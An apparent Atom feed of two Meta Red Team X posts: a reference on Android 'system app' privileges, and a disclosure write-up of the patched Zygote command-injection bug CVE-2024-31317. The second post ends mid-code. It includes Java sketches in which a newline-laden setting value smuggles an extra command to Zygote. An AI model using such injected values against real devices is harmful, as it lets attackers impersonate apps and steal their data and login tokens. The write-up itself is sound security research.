<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.9.5">Jekyll</generator><link href="https://rtx.meta.security/feed.xml" rel="self" type="application/atom+xml" /><link href="https://rtx.meta.security/" rel="alternate" type="text/html" /><updated>2024-07-08T21:53:36+00:00</updated><id>https://rtx.meta.security/feed.xml</id><title type="html">Meta Red Team X</title><subtitle>Technical writeups by Meta's Security folks, including Red Team.</subtitle><author><name>Meta Red Team X</name></author><entry><title type="html">The many meanings of “system app” in modern Android</title><link href="https://rtx.meta.security/reference/2024/07/03/Android-system-apps.html" rel="alternate" type="text/html" title="The many meanings of “system app” in modern Android" /><published>2024-07-03T00:00:00+00:00</published><updated>2024-07-03T00:00:00+00:00</updated><id>https://rtx.meta.security/reference/2024/07/03/Android-system-apps</id><content type="html" xml:base="https://rtx.meta.security/reference/2024/07/03/Android-system-apps.html"><![CDATA[<p>Not all Android apps are created equal. The Settings app on an Android device, for example, can change numerous things that no “normal” app can, regardless of how many permissions that app requests. Apps with special privileges like Settings are often called “system apps.” But what makes an app a “system app”? In answering that question for ourselves, we noticed that AOSP’s resources on the subject are disparate and assume a great deal of Android internals knowledge. We wrote this post to summarize what we learned for the benefit of security researchers, app developers, and enthusiasts alike.</p>

<p>In modern Android, two main things determine what an app can do—the set of <a href="https://developer.android.com/guide/topics/permissions/overview">permissions</a> it’s been granted and the SELinux domain it runs in. Permissions typically gate Binder access to system services and app components on a call-by-call basis, while SELinux gates access to Linux kernel objects (e.g. files, sockets, device nodes) and to entire Binder services. Although any app on Android can <a href="https://developer.android.com/guide/topics/permissions/defining">define a permission</a>, we’ll constrain our discussion to <em>platform permissions</em>, which are permissions built into Android that control access to system APIs.</p>

<p>Most platform permissions are defined in <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:frameworks/base/core/res/AndroidManifest.xml;l=838-7856">the manifest of the special android package</a><sup id="fnref:platform-manifests" role="doc-noteref"><a href="#fn:platform-manifests" class="footnote" rel="footnote">1</a></sup>. Note how each one includes a <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:frameworks/base/core/res/res/values/attrs_manifest.xml;l=194-317"><code class="language-plaintext highlighter-rouge">protectionLevel</code></a> string consisting of a <em>base type</em> (<code class="language-plaintext highlighter-rouge">normal</code>, <code class="language-plaintext highlighter-rouge">dangerous</code>, <code class="language-plaintext highlighter-rouge">signature</code>, or <code class="language-plaintext highlighter-rouge">internal</code>) modified by zero or more <em>flags</em> (denoted with a leading <code class="language-plaintext highlighter-rouge">|</code>, as in <code class="language-plaintext highlighter-rouge">|privileged</code>). A permission’s <code class="language-plaintext highlighter-rouge">protectionLevel</code> indirectly <a href="https://android.googlesource.com/platform/frameworks/base/+/refs/tags/android-14.0.0_r51/core/java/android/permission/Permissions.md">specifies which apps may use it</a>.</p>
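<p>For illustration, a platform permission entry in that manifest takes roughly the following shape (abridged sketch based on AOSP; consult the linked manifest for the authoritative definitions):</p>

```xml
<!-- Base type "signature" plus the flags "privileged" and "development":
     grantable to platform-signed apps, allowlisted priv-apps, or via
     "adb shell pm grant" on debuggable scenarios. -->
<permission android:name="android.permission.WRITE_SECURE_SETTINGS"
    android:protectionLevel="signature|privileged|development" />
```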

<p>App SELinux domains are defined as part of Android’s <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:system/sepolicy/">OS-wide SELinux policy</a>. SELinux is used for more than just apps, so app domains (e.g. <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:system/sepolicy/private/priv_app.te"><code class="language-plaintext highlighter-rouge">priv_app</code></a>) are denoted by the <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:system/sepolicy/private/app.te"><code class="language-plaintext highlighter-rouge">appdomain</code></a> attribute. A set of textual policy rules, located in <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:system/sepolicy/private/seapp_contexts"><code class="language-plaintext highlighter-rouge">/system/etc/selinux/plat_seapp_contexts</code></a> and similar files on <a href="https://source.android.com/docs/core/architecture/partitions/shared-system-image#partitions-ssi">other Project Treble partitions</a><sup id="fnref:treble-partitions" role="doc-noteref"><a href="#fn:treble-partitions" class="footnote" rel="footnote">2</a></sup>, tell Android which domain to assign a given app.</p>
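<p>A few abridged, illustrative rules in the style of AOSP’s <code class="language-plaintext highlighter-rouge">plat_seapp_contexts</code> show the flavor of this mapping — each line matches apps by properties such as UID, signing <code class="language-plaintext highlighter-rouge">seinfo</code>, or target SDK, and assigns an SELinux domain (simplified; the real file has more keys and rules):</p>

```plaintext
user=system seinfo=platform domain=system_app type=system_app_data_file
user=_app seinfo=platform domain=platform_app type=app_data_file levelFrom=user
user=_app isPrivApp=true domain=priv_app type=privapp_data_file levelFrom=user
user=_app minTargetSdkVersion=28 domain=untrusted_app type=app_data_file levelFrom=all
```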

<p>Although <code class="language-plaintext highlighter-rouge">protectionLevel</code> and <code class="language-plaintext highlighter-rouge">seapp_contexts</code> fully define the privileges available to each app, both are complex and have many special cases, so it can be hard to pick out which parts matter. In our experience, most apps on a device can be classified into one or more of the following five groups, each of which grants certain privileges. Every group but the first represents some flavor of “system app”:</p>

<ul>
  <li><strong>Untrusted apps</strong> are apps that can be built by a third-party developer and installed to any Android device. Android will only grant them platform permissions with base type <code class="language-plaintext highlighter-rouge">normal</code> or <code class="language-plaintext highlighter-rouge">dangerous</code>, and they run in some flavor of <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:system/sepolicy/private/untrusted_app_all.te"><code class="language-plaintext highlighter-rouge">untrusted_app</code> SELinux domain</a>. This is the vast majority of apps on the Play Store.</li>
  <li><strong>Preinstalled apps</strong> are all the apps that come with a device. They’re located in <code class="language-plaintext highlighter-rouge">app/</code> and <code class="language-plaintext highlighter-rouge">priv-app/</code> directories under <code class="language-plaintext highlighter-rouge">/system</code>, other Project Treble partitions, and <a href="https://source.android.com/docs/core/ota/apex">APEX modules</a>. Such apps can be granted <a href="https://android.googlesource.com/platform/frameworks/base/+/refs/tags/android-14.0.0_r51/core/java/android/permission/Permissions.md#preinstalled-permissions"><code class="language-plaintext highlighter-rouge">|preinstalled</code></a> permissions and are marked <a href="https://developer.android.com/reference/android/content/pm/ApplicationInfo#FLAG_SYSTEM">FLAG_SYSTEM</a>. (Although that flag’s documentation says it “should not be used to make security decisions,” some APIs give it special treatment anyway.) Updates to preinstalled apps, which live in <code class="language-plaintext highlighter-rouge">/data/app/</code> like untrusted apps, are still considered preinstalled.</li>
  <li><strong>Privileged apps</strong> are preinstalled apps that live in <code class="language-plaintext highlighter-rouge">priv-app/</code> instead of <code class="language-plaintext highlighter-rouge">app/</code>. (Prior to Android 4.4, there was no <code class="language-plaintext highlighter-rouge">priv-app/</code> and all preinstalled apps were privileged.) They run in the <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:system/sepolicy/private/priv_app.te"><code class="language-plaintext highlighter-rouge">priv_app</code> SELinux domain</a> and can request <code class="language-plaintext highlighter-rouge">|privileged</code> permissions subject to the constraints of <a href="https://source.android.com/docs/core/permissions/perms-allowlist"><code class="language-plaintext highlighter-rouge">privapp-permissions.xml</code></a> (introduced in Android 8).</li>
  <li><strong>Platform-signed apps</strong> are apps that share a signing key (the “platform key”) with <code class="language-plaintext highlighter-rouge">/system/framework/framework-res.apk</code> and so can be granted <code class="language-plaintext highlighter-rouge">signature</code> platform permissions. They run in the <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:system/sepolicy/private/platform_app.te"><code class="language-plaintext highlighter-rouge">platform_app</code> SELinux domain</a>. Platform-signed apps don’t need to be preinstalled, but they typically are.</li>
  <li><strong>System-UID apps</strong> are platform-signed apps that run as the <code class="language-plaintext highlighter-rouge">system</code> user (UID 1000) by specifying <code class="language-plaintext highlighter-rouge">android:sharedUserId="android.uid.system"</code> in their manifest; for example, <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:packages/apps/Settings/AndroidManifest.xml;l=5">here’s where the Settings app specifies it</a>. Only platform-signed apps can do that, as the standard rules of <a href="https://developer.android.com/guide/topics/manifest/manifest-element#uid"><code class="language-plaintext highlighter-rouge">sharedUserId</code></a> require all apps in a UID to share a signing key. System-UID apps run in the <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:system/sepolicy/private/system_app.te"><code class="language-plaintext highlighter-rouge">system_app</code> SELinux domain</a> and <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:frameworks/base/core/java/android/app/ActivityManager.java;l=4768,4782-4785">bypass all permission checks</a>. Notably, <code class="language-plaintext highlighter-rouge">system</code> is just one of <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r51:frameworks/base/services/core/java/com/android/server/pm/PackageManagerService.java;l=2033-2050">several special users</a> that appropriately-signed apps can run as.</li>
</ul>
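<p>To make the last group concrete, a system-UID app declares the shared UID at the top level of its manifest, as Settings does. An illustrative (incomplete) sketch:</p>

```xml
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.android.settings"
    android:sharedUserId="android.uid.system">
    <!-- Installation only succeeds if the APK is signed with the
         platform key, because the app joins UID 1000 (system). -->
</manifest>
```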

<p>If an app qualifies for multiple SELinux domains, Android prioritizes them in this order: <code class="language-plaintext highlighter-rouge">system_app</code>, <code class="language-plaintext highlighter-rouge">platform_app</code>, <code class="language-plaintext highlighter-rouge">priv_app</code>, <code class="language-plaintext highlighter-rouge">untrusted_app</code>. This is theoretically the order of descending privilege, but nothing enforces that. For example, we’ve seen devices whose vendor SELinux policy lets <code class="language-plaintext highlighter-rouge">priv_app</code> access resources that <code class="language-plaintext highlighter-rouge">system_app</code> cannot!</p>

<p>These groups describe the most common ways apps qualify for special privileges, but they are not comprehensive. Here are just a few examples of why two apps in the same group(s) might end up with different privileges:</p>

<ul>
  <li>The user has opted into a <code class="language-plaintext highlighter-rouge">dangerous</code> permission for one but not the other.</li>
  <li>Their signing keys differ, giving them access to different sets of app-defined <code class="language-plaintext highlighter-rouge">signature</code> permissions.</li>
  <li>One has been assigned a <a href="https://source.android.com/docs/core/permissions/android-roles">role</a> that grants it certain privileged permissions. (<code class="language-plaintext highlighter-rouge">|role</code> is one of several lesser-used <code class="language-plaintext highlighter-rouge">protectionLevel</code> flags we didn’t discuss.)</li>
  <li><code class="language-plaintext highlighter-rouge">seapp_contexts</code> contains a rule that puts one into a special SELinux domain based on its package name or UID. (Vendors often use such rules to give their own apps extra hardware access.)</li>
</ul>

<p>Nonetheless, we find these groups very useful as a mental model. For example, they helped us quantify the security impact of <a href="https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html">two</a> <a href="https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html">vulnerabilities</a> we discovered that let attackers run code in the context of various apps. We hope you’ll find them equally useful.</p>

<p><em>Thanks to Yiannis Kozyrakis, Adam Sindelar, Nik Tsytsarkin, and Vlad Ionescu for improvements and corrections.</em></p>
<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:platform-manifests" role="doc-endnote">
      <p>Platform permissions can also be defined in the manifests of other platform-signed apps, but the majority are in the <code class="language-plaintext highlighter-rouge">android</code> manifest. <a href="#fnref:platform-manifests" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:treble-partitions" role="doc-endnote">
      <p><code class="language-plaintext highlighter-rouge">/system_ext</code>, <code class="language-plaintext highlighter-rouge">/vendor</code>, <code class="language-plaintext highlighter-rouge">/product</code>, and <code class="language-plaintext highlighter-rouge">/odm</code> as of this writing. <a href="#fnref:treble-partitions" class="reversefootnote" role="doc-backlink">&#8617;</a></p>

    </li>
  </ol>
</div>]]></content><author><name>Tom Hebb, Red Team X</name></author><category term="reference" /><summary type="html"><![CDATA[Not all Android apps are created equal. The Settings app on an Android device, for example, can change numerous things that no “normal” app can, regardless of how many permissions that app requests. Apps with special privileges like Settings are often called “system apps.” But what makes an app a “system app”? In answering that question for ourselves, we noticed that AOSP’s resources on the subject are disparate and assume a great deal of Android internals knowledge. We wrote this post to summarize what we learned for the benefit of security researchers, app developers, and enthusiasts alike.]]></summary></entry><entry><title type="html">Becoming any Android app via Zygote command injection</title><link href="https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html" rel="alternate" type="text/html" title="Becoming any Android app via Zygote command injection" /><published>2024-06-03T00:00:00+00:00</published><updated>2024-06-03T00:00:00+00:00</updated><id>https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection</id><content type="html" xml:base="https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html"><![CDATA[<p>We have discovered a vulnerability in Android that allows an attacker with the WRITE_SECURE_SETTINGS permission, which is held by the ADB shell and certain privileged apps, to execute arbitrary code as any app on a device. By doing so, they can read and write any app’s data, make use of per-app secrets and login tokens, change most system configuration, unenroll or bypass Mobile Device Management, and more. Our exploit involves no memory corruption, meaning it works unmodified on virtually any device running Android 9 or later, and persists across reboots.</p>

<p><a href="https://android.googlesource.com/platform/frameworks/base/+/e25a0e394bbfd6143a557e1019bb7ad992d11985">A patch</a> for the issue, tracked as <a href="https://www.cve.org/CVERecord?id=CVE-2024-31317">CVE-2024-31317</a>, is included in <a href="https://source.android.com/docs/security/bulletin/2024-06-01">today’s Android Security Bulletin</a>. As is Google’s practice, device vendors were sent the bulletin a month ago, so updates for supported devices should be forthcoming or already available. Android builds with a June 2024 or later patch level are no longer vulnerable.</p>

<h2 id="background-android-app-isolation">Background: Android app isolation</h2>

<p>Despite its Linux kernel, Android’s security model differs fundamentally from that of desktop Linux. Linux is often called a multi-user operating system, but Android might be more appropriately called a multi-app operating system. On Android, what a process can do is determined not by which user started it but by which app it belongs to, and the OS <a href="https://source.android.com/docs/security/app-sandbox">guarantees</a> that one app cannot impersonate another.</p>

<p>That concept of app identity—which Android implements by giving each app its own Linux UID—underpins most Android security policy. Per-app <a href="https://developer.android.com/guide/topics/permissions/overview">permissions</a> gate sensitive API calls, <a href="https://developer.android.com/privacy-and-security/keystore">cryptographic keys</a> and <a href="https://developer.android.com/reference/android/accounts/AccountManager">account credentials</a> are visible only to the apps that created them, and <a href="https://source.android.com/docs/devices/admin">device management actions</a> are exclusive to a designated “device owner” app. If an attacker finds a way to impersonate a highly-privileged app, that’s often all they need to achieve their objective.</p>

<p>In <a href="/exploitation/2024/03/04/Android-run-as-forgery.html">my last post</a>, we impersonated apps by exploiting an injection vulnerability in a file used by run-as, a tool designed to debug apps during development. run-as was an attractive target because it’s one of the few processes on Android that’s <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:system/sepolicy/public/runas.te;l=25-26">allowed to change its UID</a><sup id="fnref:cap-setuid" role="doc-noteref"><a href="#fn:cap-setuid" class="footnote" rel="footnote">1</a></sup>. However, run-as can only be invoked from the ADB shell, quite a high bar for an attacker. In this post, we’ll lower that bar by instead exploiting <strong>Zygote</strong>, one of the few other processes that <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:system/sepolicy/private/zygote.te;l=10-11">can change its UID</a>.</p>

<h2 id="background-zygote">Background: Zygote</h2>

<p>When an app starts, Zygote is what creates its main process and sets that process’s identity. Although only System Server<sup id="fnref:system-server" role="doc-noteref"><a href="#fn:system-server" class="footnote" rel="footnote">2</a></sup> can send commands to Zygote, it does so in response to requests (e.g. Activity launches) made by ordinary apps. When System Server receives a request for an app that’s not running, it starts that app by telling Zygote to spawn a process with the appropriate package name, data directory, UID, SELinux domain, and so forth.</p>

<p>Notably, System Server controls security-critical parameters like the new app’s UID. Zygote, perhaps because of its early position in the boot sequence, doesn’t query those parameters from the Android package database itself. That means we can impersonate arbitrary apps if we can control the commands System Server sends—no Zygote exploit needed!</p>

<p>Zygote runs as a daemon and <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/com/android/internal/os/ZygoteServer.java;l=508-579">accepts commands</a> on a UNIX stream socket at <code class="language-plaintext highlighter-rouge">/dev/socket/zygote</code>. Stream sockets aren’t message-oriented, so Zygote’s wire protocol must define where one command ends and the next begins. It does so <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/android/os/ZygoteProcess.java;l=430-440">very simply</a>: each command is UTF-8 text and consists of a decimal number followed by that many <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/com/android/internal/os/ZygoteArguments.java;l=266-540">arguments</a>, each on its own line. The line after the final argument begins the next command.</p>

<p>A command consists only of a sequence of arguments. Unlike most command protocols, Zygote’s has no concept of a “command type”. Every command by default spawns a new process, and the arguments specify the details of that process. Certain <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/com/android/internal/os/ZygoteConnection.java;l=137-187">special arguments</a> override that default, causing Zygote to instead perform some other action.</p>

<p>Here’s an example of a typical process spawn command (with many arguments elided for brevity), followed by a special “set API denylist exemptions” command, which will prove relevant very soon. The text in brackets is explanatory and not part of the protocol:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>8                              [command #1 arg count]
--runtime-args                 [arg #1: vestigial, needed for process spawn]
--setuid=10266                 [arg #2: process UID]
--setgid=10266                 [arg #3: process GID]
--target-sdk-version=31        [args #4-#7: misc app parameters]
--nice-name=com.facebook.orca
--app-data-dir=/data/user/0/com.facebook.orca
--package-name=com.facebook.orca
android.app.ActivityThread     [arg #8: Java entry point]
3                              [command #2 arg count]
--set-api-denylist-exemptions  [arg #1: special argument, don't spawn process]
LClass1;-&gt;method1(             [args #2, #3: denylist entries]
LClass1;-&gt;field1:
</code></pre></div></div>
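<p>The framing above can be reproduced in a few lines of plain Java. This is our simplified stand-in for <code class="language-plaintext highlighter-rouge">ZygoteProcess</code>’s writer, not the real implementation — but it captures the protocol’s one rule: a decimal count line, then that many argument lines:</p>

```java
import java.util.List;

// Simplified sketch of Zygote command framing: a decimal argument count
// on one line, followed by each argument on its own line.
public class ZygoteFraming {
    public static String encode(List<String> args) {
        StringBuilder sb = new StringBuilder();
        sb.append(args.size()).append('\n');
        for (String arg : args) {
            sb.append(arg).append('\n');
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        String wire = encode(List.of("--runtime-args", "--setuid=10266"));
        System.out.print(wire); // prints "2", then the two arguments
    }
}
```

<p>Note that nothing here escapes newlines <em>inside</em> an argument: an argument containing <code class="language-plaintext highlighter-rouge">\n</code> makes the receiver see more lines than the declared count, which is exactly the property the vulnerability exploits.</p>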

<h2 id="vulnerability-details">Vulnerability details</h2>

<p>We have found a <a href="https://developer.android.com/reference/android/provider/Settings.Global">global setting</a> in Android, “hidden_api_blacklist_exemptions”, whose value gets included directly in a Zygote command. System Server doesn’t expect the setting to contain newlines, so it neither escapes them nor accounts for them in the command’s argument count. By writing a malicious value to that setting, an attacker can place lines of their choosing after the last declared argument. When Zygote sees those lines, it believes them to be a separate command, which it executes!</p>

<p>The vulnerable code path begins at <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/services/core/java/com/android/server/am/ActivityManagerService.java;l=2329-2350">a ContentObserver callback</a> in System Server, which fires when hidden_api_blacklist_exemptions is changed for any reason:</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">private</span> <span class="kt">void</span> <span class="nf">update</span><span class="o">()</span> <span class="o">{</span>
    <span class="nc">String</span> <span class="n">exemptions</span> <span class="o">=</span> <span class="nc">Settings</span><span class="o">.</span><span class="na">Global</span><span class="o">.</span><span class="na">getString</span><span class="o">(</span><span class="n">mContext</span><span class="o">.</span><span class="na">getContentResolver</span><span class="o">(),</span>
            <span class="nc">Settings</span><span class="o">.</span><span class="na">Global</span><span class="o">.</span><span class="na">HIDDEN_API_BLACKLIST_EXEMPTIONS</span><span class="o">);</span>
    <span class="k">if</span> <span class="o">(!</span><span class="nc">TextUtils</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">exemptions</span><span class="o">,</span> <span class="n">mExemptionsStr</span><span class="o">))</span> <span class="o">{</span>
        <span class="n">mExemptionsStr</span> <span class="o">=</span> <span class="n">exemptions</span><span class="o">;</span>
        <span class="k">if</span> <span class="o">(</span><span class="s">"*"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">exemptions</span><span class="o">))</span> <span class="o">{</span>
            <span class="n">mBlacklistDisabled</span> <span class="o">=</span> <span class="kc">true</span><span class="o">;</span>
            <span class="n">mExemptions</span> <span class="o">=</span> <span class="nc">Collections</span><span class="o">.</span><span class="na">emptyList</span><span class="o">();</span>
        <span class="o">}</span> <span class="k">else</span> <span class="o">{</span>
            <span class="n">mBlacklistDisabled</span> <span class="o">=</span> <span class="kc">false</span><span class="o">;</span>
            <span class="n">mExemptions</span> <span class="o">=</span> <span class="nc">TextUtils</span><span class="o">.</span><span class="na">isEmpty</span><span class="o">(</span><span class="n">exemptions</span><span class="o">)</span>
                    <span class="o">?</span> <span class="nc">Collections</span><span class="o">.</span><span class="na">emptyList</span><span class="o">()</span>
                    <span class="o">:</span> <span class="nc">Arrays</span><span class="o">.</span><span class="na">asList</span><span class="o">(</span><span class="n">exemptions</span><span class="o">.</span><span class="na">split</span><span class="o">(</span><span class="s">","</span><span class="o">));</span>
        <span class="o">}</span>
        <span class="k">if</span> <span class="o">(!</span><span class="no">ZYGOTE_PROCESS</span><span class="o">.</span><span class="na">setApiDenylistExemptions</span><span class="o">(</span><span class="n">mExemptions</span><span class="o">))</span> <span class="o">{</span>
          <span class="nc">Slog</span><span class="o">.</span><span class="na">e</span><span class="o">(</span><span class="no">TAG</span><span class="o">,</span> <span class="s">"Failed to set API blacklist exemptions!"</span><span class="o">);</span>
          <span class="c1">// leave mExemptionsStr as is, so we don't try to send the same list again.</span>
          <span class="n">mExemptions</span> <span class="o">=</span> <span class="nc">Collections</span><span class="o">.</span><span class="na">emptyList</span><span class="o">();</span>
        <span class="o">}</span>
    <span class="o">}</span>
    <span class="n">mPolicy</span> <span class="o">=</span> <span class="n">getValidEnforcementPolicy</span><span class="o">(</span><span class="nc">Settings</span><span class="o">.</span><span class="na">Global</span><span class="o">.</span><span class="na">HIDDEN_API_POLICY</span><span class="o">);</span>
<span class="o">}</span>
</code></pre></div></div>

<p>From this code, we see that the setting contains a comma-separated list of strings that gets split into an array and passed down to <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/android/os/ZygoteProcess.java;l=903-921"><code class="language-plaintext highlighter-rouge">ZYGOTE_PROCESS.setApiDenylistExemptions()</code></a>. The code incidentally prevents the attacker from using commas, but it does nothing about newlines.</p>
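<p>The resulting desynchronization is easy to reproduce outside Android. The sketch below is our own simplification, not AOSP code: it frames a denylist-exemptions command the same way <code class="language-plaintext highlighter-rouge">maybeSetApiDenylistExemptions()</code> does, and shows that a setting value containing newlines smuggles extra lines past the declared argument count:</p>

```java
import java.util.Arrays;
import java.util.List;

// Simplified model of the vulnerable framing: System Server declares
// (entries + 1) arguments but never inspects the entries for newlines.
public class DenylistInjection {
    public static String frame(String settingValue) {
        List<String> exemptions = Arrays.asList(settingValue.split(","));
        StringBuilder sb = new StringBuilder();
        sb.append(exemptions.size() + 1).append('\n');
        sb.append("--set-api-denylist-exemptions").append('\n');
        for (String e : exemptions) {
            sb.append(e).append('\n');
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        // Benign value: the declared count matches the actual lines.
        System.out.print(frame("LClass1;->method1("));

        // Malicious value: the embedded newlines end the declared command
        // early, so Zygote parses everything after them as a *second*
        // command ("1" = arg count, then one attacker-chosen argument).
        System.out.print(frame("legit\n1\n--injected-arg"));
    }
}
```

<p>In the second case the writer declares two arguments, but Zygote receives five lines — the trailing three form a fresh command entirely under the attacker’s control.</p>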

<p><code class="language-plaintext highlighter-rouge">ZYGOTE_PROCESS</code> is a singleton instance of <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/android/os/ZygoteProcess.java">ZygoteProcess</a>, a client for Zygote’s wire protocol. <code class="language-plaintext highlighter-rouge">setApiDenylistExemptions()</code> just calls another method, <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/android/os/ZygoteProcess.java;l=953-982"><code class="language-plaintext highlighter-rouge">maybeSetApiDenylistExemptions()</code></a>, twice: once for the primary (64-bit) Zygote, and once for the secondary (32-bit) one:</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@GuardedBy</span><span class="o">(</span><span class="s">"mLock"</span><span class="o">)</span>
<span class="kd">private</span> <span class="kt">boolean</span> <span class="nf">maybeSetApiDenylistExemptions</span><span class="o">(</span><span class="nc">ZygoteState</span> <span class="n">state</span><span class="o">,</span> <span class="kt">boolean</span> <span class="n">sendIfEmpty</span><span class="o">)</span> <span class="o">{</span>
    <span class="k">if</span> <span class="o">(</span><span class="n">state</span> <span class="o">==</span> <span class="kc">null</span> <span class="o">||</span> <span class="n">state</span><span class="o">.</span><span class="na">isClosed</span><span class="o">())</span> <span class="o">{</span>
        <span class="nc">Slog</span><span class="o">.</span><span class="na">e</span><span class="o">(</span><span class="no">LOG_TAG</span><span class="o">,</span> <span class="s">"Can't set API denylist exemptions: no zygote connection"</span><span class="o">);</span>
        <span class="k">return</span> <span class="kc">false</span><span class="o">;</span>
    <span class="o">}</span> <span class="k">else</span> <span class="k">if</span> <span class="o">(!</span><span class="n">sendIfEmpty</span> <span class="o">&amp;&amp;</span> <span class="n">mApiDenylistExemptions</span><span class="o">.</span><span class="na">isEmpty</span><span class="o">())</span> <span class="o">{</span>
        <span class="k">return</span> <span class="kc">true</span><span class="o">;</span>
    <span class="o">}</span>

    <span class="k">try</span> <span class="o">{</span>
        <span class="n">state</span><span class="o">.</span><span class="na">mZygoteOutputWriter</span><span class="o">.</span><span class="na">write</span><span class="o">(</span><span class="nc">Integer</span><span class="o">.</span><span class="na">toString</span><span class="o">(</span><span class="n">mApiDenylistExemptions</span><span class="o">.</span><span class="na">size</span><span class="o">()</span> <span class="o">+</span> <span class="mi">1</span><span class="o">));</span>
        <span class="n">state</span><span class="o">.</span><span class="na">mZygoteOutputWriter</span><span class="o">.</span><span class="na">newLine</span><span class="o">();</span>
        <span class="n">state</span><span class="o">.</span><span class="na">mZygoteOutputWriter</span><span class="o">.</span><span class="na">write</span><span class="o">(</span><span class="s">"--set-api-denylist-exemptions"</span><span class="o">);</span>
        <span class="n">state</span><span class="o">.</span><span class="na">mZygoteOutputWriter</span><span class="o">.</span><span class="na">newLine</span><span class="o">();</span>
        <span class="k">for</span> <span class="o">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="o">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">mApiDenylistExemptions</span><span class="o">.</span><span class="na">size</span><span class="o">();</span> <span class="o">++</span><span class="n">i</span><span class="o">)</span> <span class="o">{</span>
            <span class="n">state</span><span class="o">.</span><span class="na">mZygoteOutputWriter</span><span class="o">.</span><span class="na">write</span><span class="o">(</span><span class="n">mApiDenylistExemptions</span><span class="o">.</span><span class="na">get</span><span class="o">(</span><span class="n">i</span><span class="o">));</span>
            <span class="n">state</span><span class="o">.</span><span class="na">mZygoteOutputWriter</span><span class="o">.</span><span class="na">newLine</span><span class="o">();</span>
        <span class="o">}</span>
        <span class="n">state</span><span class="o">.</span><span class="na">mZygoteOutputWriter</span><span class="o">.</span><span class="na">flush</span><span class="o">();</span>
        <span class="kt">int</span> <span class="n">status</span> <span class="o">=</span> <span class="n">state</span><span class="o">.</span><span class="na">mZygoteInputStream</span><span class="o">.</span><span class="na">readInt</span><span class="o">();</span>
        <span class="k">if</span> <span class="o">(</span><span class="n">status</span> <span class="o">!=</span> <span class="mi">0</span><span class="o">)</span> <span class="o">{</span>
            <span class="nc">Slog</span><span class="o">.</span><span class="na">e</span><span class="o">(</span><span class="no">LOG_TAG</span><span class="o">,</span> <span class="s">"Failed to set API denylist exemptions; status "</span> <span class="o">+</span> <span class="n">status</span><span class="o">);</span>
        <span class="o">}</span>
        <span class="k">return</span> <span class="kc">true</span><span class="o">;</span>
    <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">IOException</span> <span class="n">ioe</span><span class="o">)</span> <span class="o">{</span>
        <span class="nc">Slog</span><span class="o">.</span><span class="na">e</span><span class="o">(</span><span class="no">LOG_TAG</span><span class="o">,</span> <span class="s">"Failed to set API denylist exemptions"</span><span class="o">,</span> <span class="n">ioe</span><span class="o">);</span>
        <span class="n">mApiDenylistExemptions</span> <span class="o">=</span> <span class="nc">Collections</span><span class="o">.</span><span class="na">emptyList</span><span class="o">();</span>
        <span class="k">return</span> <span class="kc">false</span><span class="o">;</span>
    <span class="o">}</span>
<span class="o">}</span>
</code></pre></div></div>

<p>And just like that, the command goes out on the wire. None of these three methods reject or escape newlines.</p>
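<p>To make the injection concrete, here’s a minimal sketch (our own code, not AOSP’s) of the serialization logic above. The real method writes through a BufferedWriter to the Zygote socket; here a StringBuilder stands in for the socket, and the entry names are hypothetical.</p>

```java
public class ZygoteWireSketch {
    // Mirrors the shape of maybeSetApiDenylistExemptions(): argument count,
    // then the action flag, then each comma-separated entry, newline-delimited.
    static String serialize(String settingValue) {
        String[] exemptions = settingValue.split(",");
        StringBuilder wire = new StringBuilder();
        wire.append(exemptions.length + 1).append('\n');           // arg count
        wire.append("--set-api-denylist-exemptions").append('\n'); // action
        for (String e : exemptions) {
            wire.append(e).append('\n'); // embedded '\n' goes out unescaped
        }
        return wire.toString();
    }

    public static void main(String[] args) {
        // The second entry smuggles in a complete extra command: once Zygote
        // has consumed the declared 3 arguments, the remaining lines "1" and
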